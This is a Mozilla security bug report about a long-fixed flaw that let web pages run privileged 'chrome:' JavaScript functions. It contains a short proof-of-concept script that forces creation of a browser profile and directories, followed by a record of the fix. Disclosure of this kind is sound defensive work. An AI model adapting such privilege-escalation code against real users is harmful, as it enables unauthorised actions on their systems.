Closed
Bug 21923
Opened 25 years ago
Closed 25 years ago
Executing functions in "chrome:" protocol - #2.
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M13
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
There is another chrome vulnerability, which allows executing JavaScript functions in the "chrome:" protocol. This is dangerous because such functions have much more priviligies than JavaScript functions loaded from a web page. If one opens a "chrome:" url in a window, he have access to all functions in the window and the functions are executed by "windowname.functionname()" in the "chrome:" protocol. Some of the predefined functions in the Mozilla chrome may do dangerous things. The code is: ---------------------------------------------------------------------- <SCRIPT> b=window.open("","victim"); function g() { b.profile.createNewProfile("georgi","c:\\georgi\\"); alert("Profile created! You'd better close this window because directories are created"); } setInterval("g()",4000); </SCRIPT> <A HREF="chrome://profile/content/createProfileWizard.xul" TARGET="victim">Follow this link for demonstration</A> ----------------------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M13
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee | ||
Comment 1•25 years ago
|
||
Added call to CheckLoadURI from TriggerLink.
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•